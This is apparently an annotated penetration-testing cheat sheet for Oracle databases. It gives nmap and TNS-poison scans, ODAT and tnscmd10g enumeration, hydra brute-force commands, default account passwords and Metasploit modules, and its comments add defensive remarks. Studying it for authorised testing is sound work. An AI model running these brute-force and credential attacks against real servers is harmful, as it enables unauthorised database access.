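# Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP
# nmap — check for service version. The script glob is quoted so the shell
# cannot expand 'oracle*' against files in the current directory before nmap
# sees it (the original left it bare).
nmap -Pn -sV -p1521 --script='oracle*' 10.10.10.10
# Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5,
# try this exploit GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability
# The leading '+' makes nmap run the script even if its portrule would skip it.
# Defenders: the listener-side fix is restricting remote instance registration
# (Oracle's valid node checking for registration); a listener configured that
# way should no longer be reported as poisonable by this check.
nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10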
Accessing an Oracle DB using SQL*Plus
https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
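# Two Instant Client archives are unpacked below (basic + sqlplus); only the
# sqlplus URL is listed above, so fetch the matching basic package as well.
sudo mkdir -p /opt/oracle
sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
# NOTE(review): the archives may unpack into a versioned subdirectory under
# /opt/oracle — confirm the directory that actually holds libclntsh/sqlplus.
# Add the two export lines below to ~/.bashrc (nano opens it), then reload.
nano ~/.bashrc
# Only append the previous value when it is set: a bare "$LD_LIBRARY_PATH"
# that is empty leaves a trailing ':' and an empty element in
# LD_LIBRARY_PATH is treated as the current directory, so any library
# dropped into the cwd would be loaded by sqlplus.
export LD_LIBRARY_PATH=/opt/oracle${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
# PATH needs only /opt/oracle; the original copied $LD_LIBRARY_PATH into
# PATH, which also pushed every other library directory onto the search path.
export PATH=/opt/oracle:$PATH
source ~/.bashrc
sqlplus -V
# Credentials in argv are visible to every local user via `ps` and end up in
# shell history; omit the password (`sqlplus username@sid`) and sqlplus
# prompts for it instead.
sqlplus username/password@sid
# The full connect descriptor must be quoted: an unquoted '(' is a bash
# syntax error, so the original line never reached sqlplus.
sqlplus 'username/pass@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=hostname.network)(Port=1521))(CONNECT_DATA=(SID=remote_SID)))'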
# ODAT - Oracle Database Attacking Tool
# Download the release https://github.com/quentinhardy/odat/releases/
tar -xvf filename
# Run — the three lines below are alternatives (no SID, a known SID, an
# empty SID), not a sequence.
./odat all -s 10.10.10.10
./odat all -s 10.10.10.10 -d SID_NAME
./odat all -s 10.10.10.10 -d ''
# Check with creds (password is on the command line here, so it is visible
# in `ps` and shell history)
./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password
# bruteforce when you know SID
./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt
# Enum - Doesn't work if password protected (a listener password, or the
# local-OS-only listener administration that newer releases enforce, refuses
# these remote commands)
sudo apt install tnscmd10g
# Version
tnscmd10g version -h 10.10.10.10
# Status
tnscmd10g status -h 10.10.10.10
# Login to DB
# NOTE(review): sqsh is a Sybase / MS-SQL (TDS) client, not an Oracle client;
# the Oracle equivalent of this line is the sqlplus invocation above.
sqsh -S IP_Address:PORT -u username -p password
# Brute Forcing
# Noisy: every attempt is written to listener.log and the DB audit trail, and
# a profile with FAILED_LOGIN_ATTEMPTS set locks the targeted accounts.
# Passwords
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 10.10.10.10 oracle-listener
# NOTE(review): hydra's `oracle` module presumably also needs a login list
# (-l/-L) and the SID — confirm against hydra's module help.
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 10.10.10.10 oracle
# SID
# Download wordlist from here (the link was lost from the page; the path
# below is the one oscanner ships)
hydra -L /usr/share/oscanner/services.txt -s 1521 10.10.10.10 oracle-sid
# Bruteforcing Creds - Require SID
./odat passwordguesser -d SID_NAME -s 10.10.10.10 -p 1521 --accounts-file accounts/accounts_multiple.txt
Default Passwords
DBSNMP/DBSNMP — the Intelligent Agent uses this to talk to the DB server (it takes some work to change it)
SYS/CHANGE_ON_INSTALL — default SYSDBA password up to and including Oracle 9; from 10g onward this has to be set to something different!
PCMS_SYS/PCMS_SYS — Default x account
WMSYS/WMSYS — Default x account
OUTLN/OUTLN — Default x account
SCOTT/TIGER — Default x account
Metasploit
use auxiliary/scanner/oracle/sid_enum
use auxiliary/admin/oracle/tnscmd
use auxiliary/admin/oracle/sid_brute
use auxiliary/admin/oracle/oracle_login